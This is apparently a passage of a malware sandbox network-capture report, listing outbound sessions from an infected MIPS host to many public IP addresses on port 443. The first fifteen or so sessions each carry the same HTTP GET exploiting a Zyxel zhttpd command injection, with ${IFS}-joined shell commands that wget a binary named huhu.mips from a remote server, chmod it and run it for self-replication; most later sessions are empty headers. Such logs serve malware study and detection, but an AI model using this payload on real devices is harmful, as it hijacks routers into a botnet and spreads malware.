                                                        Feb 2, 2024 06:21:31.366841078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9732192.168.2.144210825.235.34.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366905928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9733192.168.2.1452358175.201.30.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366940975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9734192.168.2.1439052131.214.66.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.366969109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9735192.168.2.144031490.79.54.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367017984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9736192.168.2.145920660.207.172.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367064953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9737192.168.2.143880079.105.21.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367101908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9738192.168.2.1458466111.252.179.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367140055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9739192.168.2.1460796132.66.13.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367191076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9740192.168.2.1444606128.1.50.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367223024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9741192.168.2.143726813.111.122.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367278099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9742192.168.2.1439804217.20.118.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367322922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9743192.168.2.1438490167.25.166.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367352962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9744192.168.2.145011858.184.204.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367413044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9745192.168.2.145591097.86.248.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.367468119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9746192.168.2.1456722169.113.240.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9747192.168.2.143442884.165.95.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9748192.168.2.1435402197.169.233.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9749192.168.2.1456186221.64.222.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9750192.168.2.145786069.119.4.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9751192.168.2.1453766188.223.4.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9752192.168.2.1438366161.84.25.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9753192.168.2.143597090.253.97.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9754192.168.2.143631612.194.109.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9755192.168.2.1452802139.154.12.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9756192.168.2.144640234.189.248.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9757192.168.2.1453310118.29.28.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9758192.168.2.1439834109.132.134.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9759192.168.2.1438994207.222.133.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9760192.168.2.1452606178.208.224.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9761192.168.2.1441488203.184.194.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9762192.168.2.1446676144.236.129.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9763192.168.2.1439770119.125.162.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9764192.168.2.1455444175.230.222.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9765192.168.2.1436574208.65.144.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9766192.168.2.1458910117.158.28.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9767192.168.2.1449724198.181.47.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9768192.168.2.1438912180.163.148.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9769192.168.2.1445854207.229.67.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9770192.168.2.1441816144.173.158.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9771192.168.2.1450134112.104.241.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9772192.168.2.1435824207.168.53.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9773192.168.2.144198685.140.236.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9774192.168.2.1436588128.235.67.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9775192.168.2.1438186144.154.212.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9776192.168.2.145572832.104.165.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9777192.168.2.144625265.172.131.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9778192.168.2.144733246.169.127.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9779192.168.2.1444732131.196.45.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9780192.168.2.1459274185.167.109.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9781192.168.2.1452318221.181.199.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9782192.168.2.1449102138.235.234.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9783192.168.2.144950686.192.121.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9784192.168.2.1439452178.32.160.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9785192.168.2.1445374182.196.151.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9786192.168.2.1445986185.102.71.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9787192.168.2.1439044144.207.138.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9788192.168.2.144347265.87.124.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9789192.168.2.143669669.81.109.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9790192.168.2.144388079.185.198.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9791192.168.2.143517893.111.110.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9792192.168.2.1441726203.73.76.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9793192.168.2.1459280213.84.29.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9794192.168.2.1433790217.244.79.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9795192.168.2.1441392184.106.188.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9796192.168.2.14532689.119.228.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9797192.168.2.143758679.111.160.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9798192.168.2.144100679.124.143.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9799192.168.2.145877238.180.180.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9800192.168.2.1445782216.208.43.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9801192.168.2.1446812134.115.226.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9802192.168.2.1439480185.199.254.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9803192.168.2.1440532126.70.28.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9804192.168.2.14470082.230.48.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9805192.168.2.146078057.109.81.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9806192.168.2.144022288.114.63.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9807192.168.2.144661245.217.198.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9808192.168.2.145441413.208.134.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9809192.168.2.1454578150.67.108.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9810192.168.2.1445538207.13.147.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9811192.168.2.1449832142.208.212.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9812192.168.2.1433266106.67.15.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9813192.168.2.144122647.173.190.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9814192.168.2.1453176172.206.249.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9815192.168.2.1437756181.179.14.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9816192.168.2.1444002216.49.41.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9817192.168.2.145066418.239.205.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9818192.168.2.1449274128.72.202.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9819192.168.2.14420364.149.25.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9820192.168.2.1447474147.165.182.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9821192.168.2.144980039.79.143.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9822192.168.2.144377095.72.73.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9823192.168.2.145550834.48.153.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9824192.168.2.144744677.19.72.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9825192.168.2.145281465.69.177.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9826192.168.2.1434284122.86.183.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9827192.168.2.146021276.150.160.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9828192.168.2.1448520105.217.11.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9829192.168.2.14537849.238.51.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9830192.168.2.145548692.21.222.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9831192.168.2.143411214.81.115.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9832192.168.2.144153613.48.108.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9833192.168.2.144746650.75.51.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9834192.168.2.145438286.145.171.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9835192.168.2.144691267.124.47.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9836192.168.2.1458960156.114.145.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9837192.168.2.1444432115.155.147.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9838192.168.2.1437062164.155.105.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9839192.168.2.1439300149.15.192.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9840192.168.2.1454110181.3.49.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9841192.168.2.1446124219.58.136.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9842192.168.2.1434928137.149.146.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9843192.168.2.1444662112.237.155.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9844192.168.2.14530005.63.101.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9845192.168.2.1460356105.194.29.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9846192.168.2.144829461.201.213.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9847192.168.2.146082647.2.164.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9848192.168.2.14536784.91.144.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9849192.168.2.143751897.238.63.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9850192.168.2.144333477.207.166.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9851192.168.2.1448204140.42.7.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9852192.168.2.1460572174.226.182.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9853192.168.2.145827823.154.117.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9854192.168.2.145399218.172.41.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9855192.168.2.1459974120.252.67.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9856192.168.2.1445924216.58.230.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9857192.168.2.1455590117.244.76.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9858192.168.2.145527843.89.44.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9859192.168.2.1455942102.115.17.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9860192.168.2.145077266.89.67.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9861192.168.2.1456008118.231.16.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9862192.168.2.145822036.67.59.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9863192.168.2.1441796159.42.119.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9864192.168.2.1433866167.108.188.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9865192.168.2.143577423.164.102.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9866192.168.2.1446776123.232.220.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9867192.168.2.143689031.216.124.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9868192.168.2.1457954163.150.54.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9869192.168.2.14536582.45.246.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9870192.168.2.1441810209.30.124.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9871192.168.2.14515522.157.142.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9872192.168.2.1441884118.80.231.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9873192.168.2.1440386120.184.209.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9874192.168.2.143778625.178.58.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9875192.168.2.144623870.115.251.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9876192.168.2.144352052.23.178.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9877192.168.2.1456388176.27.77.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9878192.168.2.143613840.199.152.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9879192.168.2.1436494175.155.97.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9880192.168.2.145804482.149.44.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9881192.168.2.1448144199.75.51.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9882192.168.2.1451586148.2.192.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9883192.168.2.1440128150.69.157.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9884192.168.2.1456120183.229.118.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9885192.168.2.1448598112.134.74.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9886192.168.2.146075495.109.154.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9887192.168.2.144812289.18.141.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9888192.168.2.143906272.83.145.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9889192.168.2.144810499.120.101.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9890192.168.2.14477605.145.194.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9891192.168.2.1446634116.22.32.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9892192.168.2.1453578204.184.243.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9893192.168.2.1458330182.195.61.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9894192.168.2.1455122114.148.173.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9895192.168.2.143688293.33.115.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9896192.168.2.145571098.154.167.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9897192.168.2.145648090.19.121.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9898192.168.2.1440820105.166.149.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9899192.168.2.144328475.212.236.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9900192.168.2.1452046210.97.70.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9901192.168.2.144652080.44.95.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9902192.168.2.1445472168.128.7.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9903192.168.2.1433582185.112.122.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9904192.168.2.145089266.57.21.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9905192.168.2.1460498190.180.1.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9906192.168.2.1445338122.60.11.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9907192.168.2.144553620.5.123.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9908192.168.2.1446218216.159.219.108443
                                                        TimestampBytes transferredDirectionData


